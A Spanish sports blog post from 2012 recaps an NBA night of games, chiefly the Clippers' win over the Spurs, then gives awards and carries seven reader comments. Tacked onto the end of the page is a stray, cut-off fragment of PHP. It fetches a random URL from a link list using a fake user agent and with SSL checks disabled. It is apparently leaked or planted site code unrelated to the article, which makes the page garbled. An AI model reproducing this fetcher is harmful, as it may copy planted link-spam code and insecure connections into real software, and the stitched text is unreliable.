La Crónica: ¿Nos creemos a los Clippers?

20 de November de 2012 por txusma

Chris Paul se enfrenta a Tony ParkerYa están aquí. La victoria de los Clippers frente a los Spurs, combinada con la derrota de los Grizzlies, convierte al otrora vecino pobre de Los Angeles en el mejor equipo de la dura Conferencia Oeste. Ya es la 2ª vez que Cris Paul y compañía se imponen a los tejanos esta temporada lo que supone toda una declaración de intenciones. Aún con un Jamal Crawford más fallón que en otras ocasiones los Clippers se impusieron gracias a un Chris Paul que volvió a aparecer en los momentos decisivos y al buen hacer de un banco comandado por Matt Barnes y Eric Bledsoe (92-87). En los Spurs solo el eterno Tim Duncan dio el callo y además Stephen Jackson se lesionó y estará fuera de las canchas aproximadamente un mes. Contratiempo serio porque Jackson sustituía en el quinteto a Kawhi Leonard. Veremos como recompone Popovich el equipo.

Como hemos dicho anteriormente, los Clippers empatan con los Grizzlies gracias a la derrota de estos en casa frente Denver. Gallinari encontró el fusil que tenía guardado desde el año pasado y los masacró con 26 puntos, incluido un triple a falta de 16 segundos que amarraba definitivamente la victoria para los suyos en un partido igualadísimo (97-92). A pesar de romper la racha de 8 victorias consecutivas de los ositos, los Nuggets no deben cantar victoria. Ty Lawson sigue sin arrancar e Iguodala cuajó un partido muy pobre. Las piezas todavía no encajan como deberían.

Utah y Golden State también se sitúan en puestos de playoffs. Los primeros vencieron a los Rockets gracias a un buen inicio de 2º cuarto. James Harden jugó mermado la primera parte y ya no salió en la segunda debido a problemas respiratorios y Houston no encontró respuesta al poderío interior de los Jazz. Jefferson, Millsap, Favors e incluso Kanter camparon a sus anchas y sembraron el pánico en ambas zonas (91-102). Por su parte, los Warriors se impusieron en la prórroga a unos Mavs que siguen sin Dirk Nowitzki peleando todos los partidos. Stephen Curry fue decisivo en un equipo en que los rookies Harrison Barnes y Draymond Green empiezan a dar que hablar (105-101).

De todas maneras la sorpresa de la temporada siguen siendo los Bobcats que ayer se permitieron el lujo de ganar a otra de las sensaciones de la temporada. Les remontaron 11 puntos a los Bucks en el último cuarto con un Ramon Sessions soberbio (98-102). Walker, Mullens, Kidd-Gilchrist… siguen dando que hablar.Soberbio partido de Hibbert

En el resto de partidos de la noche, victorias de Atlanta frente Orlando en un partido muy flojo (72-81) y de Indiana frente a Washington con un Hibbert picado por las críticas recibidas hasta al momento (96-89).

PREMIOS

MVP: Vuelve la sensación de que nos leen. Ayer poníamos a caldo a Hibbert y hoy se destapa con un 20-12 más 4 tapones de regalo. La pareja formada con West hoy ha sido demasiado frente a unos Wizards que son lo más parecido a una pachanga con colegas resacosos que hay ahora mismo en la competición. Se suponía que Okafor era el bueno en el draft de Howard.

Rookie: Beal ha despertado un poco en lo único digno que ha mostrado Washington, Kidd-Gildchrist ha sido fundamental en la sorpresa de Bobctas ante Bucks… sin embargo Harrison Barnes ha deslumbrado con 20 ptos-12 rebotes en la victoria de los Warriors en Dallas.

Sorpresa: Quién nos iba a decir que Brendan Haywood iba a ser todavía un titular útil para un equipo de zona de playoffs. Lo es en los Bobcats, formando una pareja asombrosa con un Mullens liberado del trabajo sucio.

Decepción: Desconocemos qué problemas se esconden detrás de la actuación de Okafor. En 9 minutos únicamente logró capear el chaparrón de -15 que le cayó con un único rebote. En esta línea no debería extrañar que pronto pierda la condición de titular en favor de Seraphin o Booker.

Esfuerzo en vano: Lo breve y bueno, dos veces bueno. Las actuaciones de Kaman hay que paladearlas como un Vega-Sicilia. 18-17 formando una extraordinaria dupla con Mayo.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. GreenPride dice:
    #1

    ¿De verdad voy a tener que ver alguno partido de los Bobcats? Vaya comienzo de campaña que están haciendo.
    Acabo de ver el Clips-Spurs y la verdad es que a los de LA hay que tenerlos muy en cuenta. Hoy empezaron dominados por los Spurs pero el banco dio la vuelta al partido con un 19-2 en el que Matt Barnes llevó la voz cantante. Gran actuación de Bledsoe y todos carburando, hoy un poco menos Crawford. En los Spurs sólo Duncan brilló en un partido flojo de Parker muy bien defendido y con Manudona todavía buscando su mejor forma.
    Y sorpresa en Memphis donde los Nuggets pararon los pies a los Grizzlies. Denver es un equipo que lo mismo te la lía contra un candidato al anillo que pierde con cualquiera. Cuando encajen todas las piezas pueden ser muy peligrosos al igual que los Warriors si les da por defender un poco.
    Por cierto yo puse a caldo a Hibbert y es que se supone que lo que ha hecho hoy debería ser casi costumbre no excepción. Si él y West siguen a este nivel contra equipos de verdad (no como los Wizards) es lo que está por ver para ver si Indiana levanta cabeza

      Citar

  2. Viva_Dirk dice:
    #2

    Los Pacers tienen un problemón con la baja de Granger. Allí no mete un triple nadie y así no pueden sacar todo el provecho a su gran juego interior, esta misma noche 3 de 19, motivo por el que casi se les escapa un partido que ganaban de 20 a 4 minutos del final del tercer cuarto. Además sin Granger el jugador de mas jerarquia es West que se juega los tiros dificiles pero que lo tiene muy jodido cuando tenga que hacerlo delante de tios mucho mas grandes que el.

    Y los Wizars si que son algo banda, pero es que sin Wall y Nene queda aun mas en evidencia una plantilla cortísima, y con algunos jugadores extremadamente individualistas como Jordan Crawford o Chris Singleton. Cuando vuelvan habrá que estar atentos a Beal que tiene pinta de jugadorazo.

      Citar

  3. Esteban dice:
    #3

    quien vio el partido clippers vs spurs, sabra entender por que digo que los clippers son candidatos a TODO

    su 5 inicial fue superado de entrada y ahi, CHAZ, salio la banca y e igualo el partio, bledsoe, barnes y crawford le dan un baco arrollador, y si le sumamos que hollins jugo bien y odom no fue tan desastrozo como otras noches, tienen un banco de lujo

    como mola HARRISON BARNES!!! ese tio tiene todas las cualidades para dominar la NBA, y MKG se puiede decir lo mismo, en breve lo veremos al mejor estilo gerald wallace promediando 18 puintos y 10 rebotes

    lo de los bobcas es algo extraordinario

      Citar

  4. Esteban dice:
    #4

    han notado lo bien que juegan ex jugadores de los lkaers bajo el mando de otros entrenadores que no sea BROWN??

    veamos por ejemplo el caso de SESSIONS, nunca fue base titular ni lo sera, si lo hubiesen usado de sexto hombre otro hubiese sido el cantar, quiza hoy estaria en LA, anotando y anotando desde la banca, BAG ERROR DE BROWN

    alguien ha prestado atención a TROY MURPHY? quien fuera borrado de la rotacion lakers esta metiendo triple tras triple en Mavs, Carlisle a diferencia de Brown, ve que tiene un gigante con buena mano mas alla del arco y lo usa, le da libertad y algun movimiento para poder lanzar, cosa que no sucedia en LA

      Citar

  5. Knickerbocker incondicional dice:
    #5

    Los LAC definitivamente son un equipo a tener en cuenta,han demostrado tener muchos recursos.

    Lo que me ha sorprendido es que los Spurs suman su segunda derrota en casa en pocos dias, ademas de perder a Jackson por lo menos un mes… Dura noche para Pop y sus chicos.

      Citar

  6. Ruxixón dice:
    #6

    “Decepción: Desconocemos qué problemas se esconden detrás de la actuación de Okafor. En 9 minutos únicamente logró capear el chaparrón de -15 que le cayó con un único rebote. En esta línea no debería extrañar que pronto pierda la condición de titular en favor de Seraphin o Booker.”
    ———————————————————————————————-

    Ójala,y eso que venía de marcarse un buen partido para lo que viene siendo la tónica habitual de Okafor,pero como dije se está convirtiendo a pasos agigantados en un nuevo Kwame Brown.Sinceramente,para lo que aporta sólo es un estorbo,ni contribuye al buen rendimiento del equipo ni deja minutos para que los jóvenes exploten.Ahora mismo pondría Booker-Seraphin y cuando vuelva Nené,éste y Vesely,con muchos minutos para Trevor y Kevin,apartando de la rotacióna Emeka.

      Citar

  7. Sempren dice:
    #7

    Esteban, yo pensé exactamente lo mismo sobre Murphy, pero al final también me dio por pensar que si estuviera Nowitzki probablemente le pasase lo mismo que en Lakers.

    De todos modos tardó en arrancar varios partidos, pero aún así le dieron confianza, cosa que podrían haberle dado en Los Angeles, más que nada porque las alternativas eran prácticamente la nada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>